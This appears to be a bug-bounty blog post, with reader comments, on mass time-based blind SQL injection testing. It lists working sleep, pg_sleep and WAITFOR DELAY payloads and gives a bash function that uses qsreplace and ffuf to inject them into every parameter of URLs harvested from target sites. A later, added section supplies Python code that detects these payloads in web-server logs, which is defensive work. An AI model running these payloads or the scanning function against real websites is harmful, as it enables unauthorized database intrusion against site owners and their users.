Tools
- First, install the latest version of Go.
- ffuf:
  go get -u github.com/ffuf/ffuf
- qsreplace:
  go get -u github.com/tomnomnom/qsreplace
- Note: on Go 1.17 or newer, `go get` no longer installs binaries; use `go install github.com/ffuf/ffuf/v2@latest` and `go install github.com/tomnomnom/qsreplace@latest` instead.
PAYLOADS
XOR(if(now()=sysdate(),sleep(5),0))OR%27
if(now()=sysdate(),sleep(5),0)
(select(0)from(select(sleep(5)))v)/%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+%22/
%27XOR(if(now()=sysdate(),sleep(51),0))XOR%27Z
1%20AND%20(SELECT%20%20FROM%20(SELECT(SLEEP(5)))YYYY)%20AND%20%27%%27=%27
1%27XOR(if(now()=sysdate(),sleep(5),0))OR%27
1%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))YYYY)-1337
1%20or%20sleep(5)%23
%27%20WAITFOR%20DELAY%20%270:0:5%27--
%%27;SELECT%20PG_SLEEP(5)--
pg_sleep(5)
%27|%20|pg_sleep(5)--
Add this function to your .bashrc
# Time-based SQL injection: substitute each payload into every query-string value
# of the URLs in "$1" and keep only the requests whose response took 5 s or longer
# (-ft "<5000" drops everything that answered in under 5000 ms).
# Replace ~/.path/To/payloads with the file holding the payload list above.
sqliTime()
{
    # read line by line so a payload containing spaces is not split into words
    while IFS= read -r payload; do
        qsreplace "$payload" < "$1" > sqli
        ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt
        rm -f sqli
    done < ~/.path/To/payloads
}
After adding the function to .bashrc, load it into the current shell (and into any tab opened before the edit) with:
source ~/.bashrc
Example usage:
Collect the target website's URLs with any of gau, gauplus, or waybackurls, then run the function on the resulting file:
sqliTime urls
sqliTime urls.txt
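From the defender's side, the same payload families are easy to spot in web-server access logs. The following added example (not part of the original post) percent-decodes each request URI, flags the MySQL, PostgreSQL and MSSQL delay probes listed above and, where the log line records a request time, checks whether the 5 s delay actually happened, which is the same signal the ffuf -ft filter keys on. The log layout (combined format with an optional trailing request time) and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Combined log format plus an optional trailing request time in seconds (as nginx's
# $request_time would append). Assumed layout: adapt the regex to your own logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" \d{3} \S+'
    r'(?: "[^"]*" "[^"]*")?(?: (?P<rtime>[\d.]+))?'
)
# Payload families from the list above, matched on the decoded request URI;
# most specific first so the sysdate() probe is not reported as plain sleep().
PATTERNS = [
    ("mssql_waitfor", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("pg_sleep", re.compile(r"\bpg_sleep\s*\(", re.I)),
    ("mysql_sysdate", re.compile(r"now\(\)\s*=\s*sysdate\(\)", re.I)),
    ("mysql_sleep", re.compile(r"\bsleep\s*\(", re.I)),
]
DELAY_SECONDS = 5.0  # the pause the payloads in the list ask the database for

def decode_uri(uri):
    """Percent-decode twice so double-encoded probes (%2527) are visible too."""
    return unquote(unquote(uri))

def classify(line):
    """Return (family, client_ip, slow) for a probe line, or None if benign.
    slow: True if the logged request time reached DELAY_SECONDS (the injected
    delay really executed), False if not, None if the log has no timing field."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_uri(m.group("uri"))
    for family, pattern in PATTERNS:
        if pattern.search(decoded):
            rtime = m.group("rtime")
            slow = None if rtime is None else float(rtime) >= DELAY_SECONDS
            return (family, m.group("ip"), slow)
    return None

def scan(lines):
    """All probe hits in a log, in order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (not real traffic) carrying payloads from the list above.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /item?id=1%27XOR(if(now()=sysdate(),sleep(5),0))OR%27 HTTP/1.1" 200 512 "-" "curl/8.0" 5.012',
    '198.51.100.7 - - [10/Oct/2023:13:55:42 +0000] "GET /user?id=%27|%20|pg_sleep(5)-- HTTP/1.1" 200 488 "-" "curl/8.0" 5.201',
    '198.51.100.7 - - [10/Oct/2023:13:55:49 +0000] "GET /login?user=%27%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 500 142 "-" "curl/8.0" 0.038',
    '192.0.2.10 - - [10/Oct/2023:13:56:02 +0000] "GET /item?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.031',
    '198.51.100.7 - - [10/Oct/2023:13:56:15 +0000] "GET /item?id=1%20or%20sleep(5)%23 HTTP/1.1" 200 512',
]
```

A hit with slow=True means the injected delay was actually honoured by the database, so that endpoint needs fixing (parameterized queries), not just blocking of the client; slow=False or None only shows that a probe was attempted.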
Thanks for reading! I hope this helps. For more tips and methodology, follow HΛCKING.
I just found your blog and I am loving the content!
I really want to try this Blind SQLi technique using ffuf.
What do you mean by this part??
"If you run this method every time or every new tab, You should enter,
source .bashrc"
ffuf -w "urls.txt:URL" -w timebased.txt -u URLFUZZ -ft "<5000"
What about this?